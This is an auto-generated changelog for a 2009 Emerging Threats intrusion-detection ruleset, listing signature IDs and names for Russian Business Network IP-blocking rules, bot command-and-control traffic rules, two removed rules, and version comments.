(emerging-rbn-BLOCK.rules) 2407548 - ET RBN Known Russian Business Network IP TCP - BLOCKING (275) (emerging-rbn-BLOCK.rules) 2407549 - ET RBN Known Russian Business Network IP UDP - BLOCKING (275) (emerging-rbn-BLOCK.rules) 2407550 - ET RBN Known Russian Business Network IP TCP - BLOCKING (276) (emerging-rbn-BLOCK.rules) 2407551 - ET RBN Known Russian Business Network IP UDP - BLOCKING (276) (emerging-rbn-BLOCK.rules) 2407552 - ET RBN Known Russian Business Network IP TCP - BLOCKING (277) (emerging-rbn-BLOCK.rules) 2407553 - ET RBN Known Russian Business Network IP UDP - BLOCKING (277) (emerging-rbn-BLOCK.rules) 2407554 - ET RBN Known Russian Business Network IP TCP - BLOCKING (278) (emerging-rbn-BLOCK.rules) 2407555 - ET RBN Known Russian Business Network IP UDP - BLOCKING (278) (emerging-rbn-BLOCK.rules) 2407556 - ET RBN Known Russian Business Network IP TCP - BLOCKING (279) (emerging-rbn-BLOCK.rules) 2407557 - ET RBN Known Russian Business Network IP UDP - BLOCKING (279) (emerging-rbn-BLOCK.rules) 2407558 - ET RBN Known Russian Business Network IP TCP - BLOCKING (280) (emerging-rbn-BLOCK.rules) 2407559 - ET RBN Known Russian Business Network IP UDP - BLOCKING (280) (emerging-rbn-BLOCK.rules) 2407560 - ET RBN Known Russian Business Network IP TCP - BLOCKING (281) (emerging-rbn-BLOCK.rules) 2407561 - ET RBN Known Russian Business Network IP UDP - BLOCKING (281) (emerging-rbn-BLOCK.rules) 2407562 - ET RBN Known Russian Business Network IP TCP - BLOCKING (282) (emerging-rbn-BLOCK.rules) 2407563 - ET RBN Known Russian Business Network IP UDP - BLOCKING (282) (emerging-rbn-BLOCK.rules) 2407564 - ET RBN Known Russian Business Network IP TCP - BLOCKING (283) (emerging-rbn-BLOCK.rules) 2407565 - ET RBN Known Russian Business Network IP UDP - BLOCKING (283) (emerging-rbn-BLOCK.rules) 2407566 - ET RBN Known Russian Business Network IP TCP - BLOCKING (284) (emerging-rbn-BLOCK.rules) 2407567 - ET RBN Known Russian Business Network IP UDP - BLOCKING (284) 
(emerging-rbn-BLOCK.rules) 2407568 - ET RBN Known Russian Business Network IP TCP - BLOCKING (285) (emerging-rbn-BLOCK.rules) 2407569 - ET RBN Known Russian Business Network IP UDP - BLOCKING (285) (emerging-rbn-BLOCK.rules) 2407570 - ET RBN Known Russian Business Network IP TCP - BLOCKING (286) (emerging-rbn-BLOCK.rules) 2407571 - ET RBN Known Russian Business Network IP UDP - BLOCKING (286) (emerging-rbn-BLOCK.rules) 2407572 - ET RBN Known Russian Business Network IP TCP - BLOCKING (287) (emerging-rbn-BLOCK.rules) 2407573 - ET RBN Known Russian Business Network IP UDP - BLOCKING (287) (emerging-rbn-BLOCK.rules) 2407574 - ET RBN Known Russian Business Network IP TCP - BLOCKING (288) (emerging-rbn-BLOCK.rules) 2407575 - ET RBN Known Russian Business Network IP UDP - BLOCKING (288) (emerging-rbn-BLOCK.rules) 2407576 - ET RBN Known Russian Business Network IP TCP - BLOCKING (289) (emerging-rbn-BLOCK.rules) 2407577 - ET RBN Known Russian Business Network IP UDP - BLOCKING (289) (emerging-rbn-BLOCK.rules) 2407578 - ET RBN Known Russian Business Network IP TCP - BLOCKING (290) (emerging-rbn-BLOCK.rules) 2407579 - ET RBN Known Russian Business Network IP UDP - BLOCKING (290) (emerging-rbn-BLOCK.rules) 2407580 - ET RBN Known Russian Business Network IP TCP - BLOCKING (291) (emerging-rbn-BLOCK.rules) 2407581 - ET RBN Known Russian Business Network IP UDP - BLOCKING (291) (emerging-rbn-BLOCK.rules) 2407582 - ET RBN Known Russian Business Network IP TCP - BLOCKING (292) (emerging-rbn-BLOCK.rules) 2407583 - ET RBN Known Russian Business Network IP UDP - BLOCKING (292) (emerging-rbn-BLOCK.rules) 2407584 - ET RBN Known Russian Business Network IP TCP - BLOCKING (293) (emerging-rbn-BLOCK.rules) 2407585 - ET RBN Known Russian Business Network IP UDP - BLOCKING (293) (emerging-rbn-BLOCK.rules) 2407586 - ET RBN Known Russian Business Network IP TCP - BLOCKING (294) (emerging-rbn-BLOCK.rules) 2407587 - ET RBN Known Russian Business Network IP UDP - BLOCKING (294) 
(emerging-rbn-BLOCK.rules) 2407588 - ET RBN Known Russian Business Network IP TCP - BLOCKING (295) (emerging-rbn-BLOCK.rules) 2407589 - ET RBN Known Russian Business Network IP UDP - BLOCKING (295) (emerging-rbn-BLOCK.rules) 2407590 - ET RBN Known Russian Business Network IP TCP - BLOCKING (296) (emerging-rbn-BLOCK.rules) 2407591 - ET RBN Known Russian Business Network IP UDP - BLOCKING (296) (emerging-rbn-BLOCK.rules) 2407592 - ET RBN Known Russian Business Network IP TCP - BLOCKING (297) (emerging-rbn-BLOCK.rules) 2407593 - ET RBN Known Russian Business Network IP UDP - BLOCKING (297) (emerging-rbn-BLOCK.rules) 2407594 - ET RBN Known Russian Business Network IP TCP - BLOCKING (298) (emerging-rbn-BLOCK.rules) 2407595 - ET RBN Known Russian Business Network IP UDP - BLOCKING (298) (emerging-rbn-BLOCK.rules) 2407596 - ET RBN Known Russian Business Network IP TCP - BLOCKING (299) (emerging-rbn-BLOCK.rules) 2407597 - ET RBN Known Russian Business Network IP UDP - BLOCKING (299) (emerging-rbn-BLOCK.rules) 2407598 - ET RBN Known Russian Business Network IP TCP - BLOCKING (300) (emerging-rbn-BLOCK.rules) 2407599 - ET RBN Known Russian Business Network IP UDP - BLOCKING (300) (emerging-rbn-BLOCK.rules) 2407600 - ET RBN Known Russian Business Network IP TCP - BLOCKING (301) (emerging-rbn-BLOCK.rules) 2407601 - ET RBN Known Russian Business Network IP UDP - BLOCKING (301) (emerging-rbn-BLOCK.rules) 2407602 - ET RBN Known Russian Business Network IP TCP - BLOCKING (302) (emerging-rbn-BLOCK.rules) 2407603 - ET RBN Known Russian Business Network IP UDP - BLOCKING (302) (emerging-rbn-BLOCK.rules) 2407604 - ET RBN Known Russian Business Network IP TCP - BLOCKING (303) (emerging-rbn-BLOCK.rules) 2407605 - ET RBN Known Russian Business Network IP UDP - BLOCKING (303) (emerging-rbn-BLOCK.rules) 2407606 - ET RBN Known Russian Business Network IP TCP - BLOCKING (304) (emerging-rbn-BLOCK.rules) 2407607 - ET RBN Known Russian Business Network IP UDP - BLOCKING (304) 
(emerging-rbn-BLOCK.rules) 2407608 - ET RBN Known Russian Business Network IP TCP - BLOCKING (305) (emerging-rbn-BLOCK.rules) 2407609 - ET RBN Known Russian Business Network IP UDP - BLOCKING (305) (emerging-rbn-BLOCK.rules) 2407610 - ET RBN Known Russian Business Network IP TCP - BLOCKING (306) (emerging-rbn-BLOCK.rules) 2407611 - ET RBN Known Russian Business Network IP UDP - BLOCKING (306) (emerging-rbn-BLOCK.rules) 2407612 - ET RBN Known Russian Business Network IP TCP - BLOCKING (307) (emerging-rbn-BLOCK.rules) 2407613 - ET RBN Known Russian Business Network IP UDP - BLOCKING (307) (emerging-rbn-BLOCK.rules) 2407614 - ET RBN Known Russian Business Network IP TCP - BLOCKING (308) (emerging-rbn-BLOCK.rules) 2407615 - ET RBN Known Russian Business Network IP UDP - BLOCKING (308) (emerging-rbn-BLOCK.rules) 2407616 - ET RBN Known Russian Business Network IP TCP - BLOCKING (309) (emerging-rbn-BLOCK.rules) 2407617 - ET RBN Known Russian Business Network IP UDP - BLOCKING (309) (emerging-rbn-BLOCK.rules) 2407618 - ET RBN Known Russian Business Network IP TCP - BLOCKING (310) (emerging-rbn-BLOCK.rules) 2407619 - ET RBN Known Russian Business Network IP UDP - BLOCKING (310) (emerging-rbn-BLOCK.rules) 2407620 - ET RBN Known Russian Business Network IP TCP - BLOCKING (311) (emerging-rbn-BLOCK.rules) 2407621 - ET RBN Known Russian Business Network IP UDP - BLOCKING (311) (emerging-rbn-BLOCK.rules) 2407622 - ET RBN Known Russian Business Network IP TCP - BLOCKING (312) (emerging-rbn-BLOCK.rules) 2407623 - ET RBN Known Russian Business Network IP UDP - BLOCKING (312) (emerging-rbn-BLOCK.rules) 2407624 - ET RBN Known Russian Business Network IP TCP - BLOCKING (313) (emerging-rbn-BLOCK.rules) 2407625 - ET RBN Known Russian Business Network IP UDP - BLOCKING (313) (emerging-rbn-BLOCK.rules) 2407626 - ET RBN Known Russian Business Network IP TCP - BLOCKING (314) (emerging-rbn-BLOCK.rules) 2407627 - ET RBN Known Russian Business Network IP UDP - BLOCKING (314) 
(emerging-rbn-BLOCK.rules) 2407628 - ET RBN Known Russian Business Network IP TCP - BLOCKING (315) (emerging-rbn-BLOCK.rules) 2407629 - ET RBN Known Russian Business Network IP UDP - BLOCKING (315) (emerging-rbn-BLOCK.rules) 2407630 - ET RBN Known Russian Business Network IP TCP - BLOCKING (316) (emerging-rbn-BLOCK.rules) 2407631 - ET RBN Known Russian Business Network IP UDP - BLOCKING (316) (emerging-rbn-BLOCK.rules) 2407632 - ET RBN Known Russian Business Network IP TCP - BLOCKING (317) (emerging-rbn-BLOCK.rules) 2407633 - ET RBN Known Russian Business Network IP UDP - BLOCKING (317) (emerging-rbn-BLOCK.rules) 2407634 - ET RBN Known Russian Business Network IP TCP - BLOCKING (318) (emerging-rbn-BLOCK.rules) 2407635 - ET RBN Known Russian Business Network IP UDP - BLOCKING (318) (emerging-rbn-BLOCK.rules) 2407636 - ET RBN Known Russian Business Network IP TCP - BLOCKING (319) (emerging-rbn-BLOCK.rules) 2407637 - ET RBN Known Russian Business Network IP UDP - BLOCKING (319) (emerging-rbn-BLOCK.rules) 2407638 - ET RBN Known Russian Business Network IP TCP - BLOCKING (320) (emerging-rbn-BLOCK.rules) 2407639 - ET RBN Known Russian Business Network IP UDP - BLOCKING (320) (emerging-rbn-BLOCK.rules) 2407640 - ET RBN Known Russian Business Network IP TCP - BLOCKING (321) (emerging-rbn-BLOCK.rules) 2407641 - ET RBN Known Russian Business Network IP UDP - BLOCKING (321) (emerging-rbn-BLOCK.rules) 2407642 - ET RBN Known Russian Business Network IP TCP - BLOCKING (322) (emerging-rbn-BLOCK.rules) 2407643 - ET RBN Known Russian Business Network IP UDP - BLOCKING (322) (emerging-rbn-BLOCK.rules) 2407644 - ET RBN Known Russian Business Network IP TCP - BLOCKING (323) (emerging-rbn-BLOCK.rules) 2407645 - ET RBN Known Russian Business Network IP UDP - BLOCKING (323) (emerging-rbn-BLOCK.rules) 2407646 - ET RBN Known Russian Business Network IP TCP - BLOCKING (324) (emerging-rbn-BLOCK.rules) 2407647 - ET RBN Known Russian Business Network IP UDP - BLOCKING (324) 
(emerging-rbn-BLOCK.rules) 2407648 - ET RBN Known Russian Business Network IP TCP - BLOCKING (325) (emerging-rbn-BLOCK.rules) 2407649 - ET RBN Known Russian Business Network IP UDP - BLOCKING (325) (emerging-rbn-BLOCK.rules) 2407650 - ET RBN Known Russian Business Network IP TCP - BLOCKING (326) (emerging-rbn-BLOCK.rules) 2407651 - ET RBN Known Russian Business Network IP UDP - BLOCKING (326) (emerging-rbn-BLOCK.rules) 2407652 - ET RBN Known Russian Business Network IP TCP - BLOCKING (327) (emerging-rbn-BLOCK.rules) 2407653 - ET RBN Known Russian Business Network IP UDP - BLOCKING (327) (emerging-rbn-BLOCK.rules) 2407654 - ET RBN Known Russian Business Network IP TCP - BLOCKING (328) (emerging-rbn-BLOCK.rules) 2407655 - ET RBN Known Russian Business Network IP UDP - BLOCKING (328) (emerging-rbn-BLOCK.rules) 2407656 - ET RBN Known Russian Business Network IP TCP - BLOCKING (329) (emerging-rbn-BLOCK.rules) 2407657 - ET RBN Known Russian Business Network IP UDP - BLOCKING (329) (emerging-rbn-BLOCK.rules) 2407658 - ET RBN Known Russian Business Network IP TCP - BLOCKING (330) (emerging-rbn-BLOCK.rules) 2407659 - ET RBN Known Russian Business Network IP UDP - BLOCKING (330) (emerging-rbn-BLOCK.rules) 2407660 - ET RBN Known Russian Business Network IP TCP - BLOCKING (331) (emerging-rbn-BLOCK.rules) 2407661 - ET RBN Known Russian Business Network IP UDP - BLOCKING (331) (emerging-rbn-BLOCK.rules) 2407662 - ET RBN Known Russian Business Network IP TCP - BLOCKING (332) (emerging-rbn-BLOCK.rules) 2407663 - ET RBN Known Russian Business Network IP UDP - BLOCKING (332) (emerging-rbn-BLOCK.rules) 2407664 - ET RBN Known Russian Business Network IP TCP - BLOCKING (333) (emerging-rbn-BLOCK.rules) 2407665 - ET RBN Known Russian Business Network IP UDP - BLOCKING (333) (emerging-rbn-BLOCK.rules) 2407666 - ET RBN Known Russian Business Network IP TCP - BLOCKING (334) (emerging-rbn-BLOCK.rules) 2407667 - ET RBN Known Russian Business Network IP UDP - BLOCKING (334) 
(emerging-rbn-BLOCK.rules) 2407668 - ET RBN Known Russian Business Network IP TCP - BLOCKING (335) (emerging-rbn-BLOCK.rules) 2407669 - ET RBN Known Russian Business Network IP UDP - BLOCKING (335) (emerging-rbn-BLOCK.rules) 2407670 - ET RBN Known Russian Business Network IP TCP - BLOCKING (336) (emerging-rbn-BLOCK.rules) 2407671 - ET RBN Known Russian Business Network IP UDP - BLOCKING (336) (emerging-rbn-BLOCK.rules) 2407672 - ET RBN Known Russian Business Network IP TCP - BLOCKING (337) (emerging-rbn-BLOCK.rules) 2407673 - ET RBN Known Russian Business Network IP UDP - BLOCKING (337) (emerging-rbn-BLOCK.rules) 2407674 - ET RBN Known Russian Business Network IP TCP - BLOCKING (338) (emerging-rbn-BLOCK.rules) 2407675 - ET RBN Known Russian Business Network IP UDP - BLOCKING (338) (emerging-rbn-BLOCK.rules) 2407676 - ET RBN Known Russian Business Network IP TCP - BLOCKING (339) (emerging-rbn-BLOCK.rules) 2407677 - ET RBN Known Russian Business Network IP UDP - BLOCKING (339) (emerging-rbn-BLOCK.rules) 2407678 - ET RBN Known Russian Business Network IP TCP - BLOCKING (340) (emerging-rbn-BLOCK.rules) 2407679 - ET RBN Known Russian Business Network IP UDP - BLOCKING (340) (emerging-rbn-BLOCK.rules) 2407680 - ET RBN Known Russian Business Network IP TCP - BLOCKING (341) (emerging-rbn-BLOCK.rules) 2407681 - ET RBN Known Russian Business Network IP UDP - BLOCKING (341) (emerging-rbn-BLOCK.rules) 2407682 - ET RBN Known Russian Business Network IP TCP - BLOCKING (342) (emerging-rbn-BLOCK.rules) 2407683 - ET RBN Known Russian Business Network IP UDP - BLOCKING (342) (emerging-rbn-BLOCK.rules) 2407684 - ET RBN Known Russian Business Network IP TCP - BLOCKING (343) (emerging-rbn-BLOCK.rules) 2407685 - ET RBN Known Russian Business Network IP UDP - BLOCKING (343) (emerging-rbn-BLOCK.rules) 2407686 - ET RBN Known Russian Business Network IP TCP - BLOCKING (344) (emerging-rbn-BLOCK.rules) 2407687 - ET RBN Known Russian Business Network IP UDP - BLOCKING (344) 
(emerging-rbn-BLOCK.rules) 2407688 - ET RBN Known Russian Business Network IP TCP - BLOCKING (345) (emerging-rbn-BLOCK.rules) 2407689 - ET RBN Known Russian Business Network IP UDP - BLOCKING (345) (emerging-rbn-BLOCK.rules) 2407690 - ET RBN Known Russian Business Network IP TCP - BLOCKING (346) (emerging-rbn-BLOCK.rules) 2407691 - ET RBN Known Russian Business Network IP UDP - BLOCKING (346) (emerging-rbn-BLOCK.rules) 2407692 - ET RBN Known Russian Business Network IP TCP - BLOCKING (347) (emerging-rbn-BLOCK.rules) 2407693 - ET RBN Known Russian Business Network IP UDP - BLOCKING (347) (emerging-rbn-BLOCK.rules) 2407694 - ET RBN Known Russian Business Network IP TCP - BLOCKING (348) (emerging-rbn-BLOCK.rules) 2407695 - ET RBN Known Russian Business Network IP UDP - BLOCKING (348) (emerging-rbn-BLOCK.rules) 2407696 - ET RBN Known Russian Business Network IP TCP - BLOCKING (349) (emerging-rbn-BLOCK.rules) 2407697 - ET RBN Known Russian Business Network IP UDP - BLOCKING (349) (emerging-rbn-BLOCK.rules) 2407698 - ET RBN Known Russian Business Network IP TCP - BLOCKING (350) (emerging-rbn-BLOCK.rules) 2407699 - ET RBN Known Russian Business Network IP UDP - BLOCKING (350) (emerging-rbn-BLOCK.rules) 2407700 - ET RBN Known Russian Business Network IP TCP - BLOCKING (351) (emerging-rbn-BLOCK.rules) 2407701 - ET RBN Known Russian Business Network IP UDP - BLOCKING (351) (emerging-rbn-BLOCK.rules) 2407702 - ET RBN Known Russian Business Network IP TCP - BLOCKING (352) (emerging-rbn-BLOCK.rules) 2407703 - ET RBN Known Russian Business Network IP UDP - BLOCKING (352) (emerging-rbn-BLOCK.rules) 2407704 - ET RBN Known Russian Business Network IP TCP - BLOCKING (353) (emerging-rbn-BLOCK.rules) 2407705 - ET RBN Known Russian Business Network IP UDP - BLOCKING (353) (emerging-rbn-BLOCK.rules) 2407706 - ET RBN Known Russian Business Network IP TCP - BLOCKING (354) (emerging-rbn-BLOCK.rules) 2407707 - ET RBN Known Russian Business Network IP UDP - BLOCKING (354) 
(emerging-rbn-BLOCK.rules) 2407708 - ET RBN Known Russian Business Network IP TCP - BLOCKING (355) (emerging-rbn-BLOCK.rules) 2407709 - ET RBN Known Russian Business Network IP UDP - BLOCKING (355) (emerging-rbn-BLOCK.rules) 2407710 - ET RBN Known Russian Business Network IP TCP - BLOCKING (356) (emerging-rbn-BLOCK.rules) 2407711 - ET RBN Known Russian Business Network IP UDP - BLOCKING (356) (emerging-rbn-BLOCK.rules) 2407712 - ET RBN Known Russian Business Network IP TCP - BLOCKING (357) (emerging-rbn-BLOCK.rules) 2407713 - ET RBN Known Russian Business Network IP UDP - BLOCKING (357) (emerging-rbn-BLOCK.rules) 2407714 - ET RBN Known Russian Business Network IP TCP - BLOCKING (358) (emerging-rbn-BLOCK.rules) 2407715 - ET RBN Known Russian Business Network IP UDP - BLOCKING (358) (emerging-rbn-BLOCK.rules) 2407716 - ET RBN Known Russian Business Network IP TCP - BLOCKING (359) (emerging-rbn-BLOCK.rules) 2407717 - ET RBN Known Russian Business Network IP UDP - BLOCKING (359) (emerging-rbn-BLOCK.rules) 2407718 - ET RBN Known Russian Business Network IP TCP - BLOCKING (360) (emerging-rbn-BLOCK.rules) 2407719 - ET RBN Known Russian Business Network IP UDP - BLOCKING (360) (emerging-rbn-BLOCK.rules) 2407720 - ET RBN Known Russian Business Network IP TCP - BLOCKING (361) (emerging-rbn-BLOCK.rules) 2407721 - ET RBN Known Russian Business Network IP UDP - BLOCKING (361) (emerging-rbn-BLOCK.rules) 2407722 - ET RBN Known Russian Business Network IP TCP - BLOCKING (362) (emerging-rbn-BLOCK.rules) 2407723 - ET RBN Known Russian Business Network IP UDP - BLOCKING (362) (emerging-rbn-BLOCK.rules) 2407724 - ET RBN Known Russian Business Network IP TCP - BLOCKING (363) (emerging-rbn-BLOCK.rules) 2407725 - ET RBN Known Russian Business Network IP UDP - BLOCKING (363) (emerging-rbn-BLOCK.rules) 2407726 - ET RBN Known Russian Business Network IP TCP - BLOCKING (364) (emerging-rbn-BLOCK.rules) 2407727 - ET RBN Known Russian Business Network IP UDP - BLOCKING (364) 
(emerging-rbn-BLOCK.rules)
2407728 - ET RBN Known Russian Business Network IP TCP - BLOCKING (365) (emerging-rbn-BLOCK.rules)
2407729 - ET RBN Known Russian Business Network IP UDP - BLOCKING (365) (emerging-rbn-BLOCK.rules)

[---] Removed rules: [---]
2003634 - ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan (emerging-web_sql_injection.rules)
2009695 - ET CURRENT_EVENTS ISC BIND9 Update DoS (emerging.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-rbn-BLOCK.rules (2):
   # VERSION 141
   # Updated 2009-08-12 15:21:06

-> Added to emerging-rbn.rules (2):
   # VERSION 141
   # Updated 2009-08-12 15:21:06

-> Added to emerging-scan.rules (2):
   #Seen being used for vuln scanning.
   # The original script it's modified from is legitimate, so there may be some falses

-> Added to emerging-sid-msg.map (94):
   2404025 || ET DROP Known Bot C&C Server Traffic (group 26) || url,www.shadowserver.org
   2405025 || ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE || url,www.shadowserver.org
   2406730 || ET RBN Known Russian Business Network IP TCP (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406731 || ET RBN Known Russian Business Network IP UDP (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406732 || ET RBN Known Russian Business Network IP TCP (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406733 || ET RBN Known Russian Business Network IP UDP (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406734 || ET RBN Known Russian Business Network IP TCP (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406735 || ET RBN Known Russian Business Network IP UDP (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406736 || ET RBN Known Russian Business Network IP TCP (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406737 || ET RBN Known Russian Business Network IP UDP (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406738 || ET RBN Known Russian Business Network IP TCP (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406739 || ET RBN Known Russian Business Network IP UDP (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406740 || ET RBN Known Russian Business Network IP TCP (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406741 || ET RBN Known Russian Business Network IP UDP (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406742 || ET RBN Known Russian Business Network IP TCP (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406743 || ET RBN Known Russian Business Network IP UDP (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406744 || ET RBN Known Russian Business Network IP TCP (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406745 || ET RBN Known Russian Business Network IP UDP (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406746 || ET RBN Known Russian Business Network IP TCP (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406747 || ET RBN Known Russian Business Network IP UDP (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406748 || ET RBN Known Russian Business Network IP TCP (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406749 || ET RBN Known Russian Business Network IP UDP (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406750 || ET RBN Known Russian Business Network IP TCP (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406751 || ET RBN Known Russian Business Network IP UDP (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406752 || ET RBN Known Russian Business Network IP TCP (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406753 || ET RBN Known Russian Business Network IP UDP (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406754 || ET RBN Known Russian Business Network IP TCP (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406755 || ET RBN Known Russian Business Network IP UDP (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406756 || ET RBN Known Russian Business Network IP TCP (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406757 || ET RBN Known Russian Business Network IP UDP (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406758 || ET RBN Known Russian Business Network IP TCP (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406759 || ET RBN Known Russian Business Network IP UDP (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406760 || ET RBN Known Russian Business Network IP TCP (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406761 || ET RBN Known Russian Business Network IP UDP (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406762 || ET RBN Known Russian Business Network IP TCP (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406763 || ET RBN Known Russian Business Network IP UDP (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406764 || ET RBN Known Russian Business Network IP TCP (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406765 || ET RBN Known Russian Business Network IP UDP (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406766 || ET RBN Known Russian Business Network IP TCP (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406767 || ET RBN Known Russian Business Network IP UDP (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406768 || ET RBN Known Russian Business Network IP TCP (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406769 || ET RBN Known Russian Business Network IP UDP (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406770 || ET RBN Known Russian Business Network IP TCP (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406771 || ET RBN Known Russian Business Network IP UDP (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406772 || ET RBN Known Russian Business Network IP TCP (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406773 || ET RBN Known Russian Business Network IP UDP (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406774 || ET RBN Known Russian Business Network IP TCP (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2406775 || ET RBN Known Russian Business Network IP UDP (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2407730 || ET RBN Known Russian Business Network IP TCP - BLOCKING (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2407731 || ET RBN Known Russian Business Network IP UDP - BLOCKING (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2407732 || ET RBN Known Russian Business Network IP TCP - BLOCKING (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2407733 || ET RBN Known Russian Business Network IP UDP - BLOCKING (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2407734 || ET RBN Known Russian Business Network IP TCP - BLOCKING (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2407735 || ET RBN Known Russian Business Network IP UDP - BLOCKING (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
   2407736 || ET RBN Known Russian Business Network
IP TCP - BLOCKING (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407737 || ET RBN Known Russian Business Network IP UDP - BLOCKING (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407738 || ET RBN Known Russian Business Network IP TCP - BLOCKING (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407739 || ET RBN Known Russian Business Network IP UDP - BLOCKING (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407740 || ET RBN Known Russian Business Network IP TCP - BLOCKING (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407741 || ET RBN Known Russian Business Network IP UDP - BLOCKING (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407742 || ET RBN Known Russian Business Network IP TCP - BLOCKING (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407743 || ET RBN Known Russian Business Network IP UDP - BLOCKING (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407744 || ET RBN Known Russian Business Network IP TCP - BLOCKING (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407745 || ET RBN Known Russian Business Network IP UDP - BLOCKING (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407746 || ET RBN Known Russian Business Network IP TCP - BLOCKING (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407747 || ET RBN Known Russian Business Network IP UDP - BLOCKING (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407748 || ET RBN Known Russian Business Network IP TCP - BLOCKING (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407749 || ET RBN Known Russian Business Network IP UDP - BLOCKING (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407750 || ET RBN Known Russian Business Network IP TCP - BLOCKING (376) 
|| url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407751 || ET RBN Known Russian Business Network IP UDP - BLOCKING (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407752 || ET RBN Known Russian Business Network IP TCP - BLOCKING (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407753 || ET RBN Known Russian Business Network IP UDP - BLOCKING (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407754 || ET RBN Known Russian Business Network IP TCP - BLOCKING (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407755 || ET RBN Known Russian Business Network IP UDP - BLOCKING (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407756 || ET RBN Known Russian Business Network IP TCP - BLOCKING (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407757 || ET RBN Known Russian Business Network IP UDP - BLOCKING (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407758 || ET RBN Known Russian Business Network IP TCP - BLOCKING (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 